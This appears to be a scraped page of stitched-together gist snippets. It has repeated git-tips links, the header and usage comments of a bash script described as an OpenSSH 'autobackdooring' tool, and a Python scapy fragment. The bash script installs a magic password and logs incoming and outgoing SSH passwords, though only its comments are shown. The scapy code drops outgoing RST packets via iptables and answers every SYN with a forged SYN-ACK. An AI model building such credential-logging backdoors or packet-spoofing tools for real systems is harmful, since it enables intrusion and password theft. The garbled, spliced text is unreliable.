Related Setup: https://gist.github.com/hofmannsven/6814278
Related Pro Tips: https://ochronus.com/git-tips-from-the-trenches/
Related Setup: https://gist.github.com/hofmannsven/6814278
Related Pro Tips: https://ochronus.com/git-tips-from-the-trenches/
#!/bin/bash | |
# ============================================ | |
# satyr's openssh autobackdooring doohicky v0.-1 | |
# ImpendingSatyr@gmail.com | |
# ============================================ | |
# USAGE: | |
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing). | |
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything | |
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc. | |
# [it'll install them via apt or yum, whichever is available]). |
#!/usr/local/bin/python2
from scapy.all import *
os.system("iptables -A OUTPUT -p tcp -o eth0 --sport 1:65535 --tcp-flags RST RST -j DROP")
def packet(pkt):
if pkt[TCP].flags == 2:
print('SYN packet detected port : ' + str(pkt[TCP].sport) + ' from IP Src : ' + pkt[IP].src)
send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport,ack=pkt[TCP].seq + 1, flags='SA'))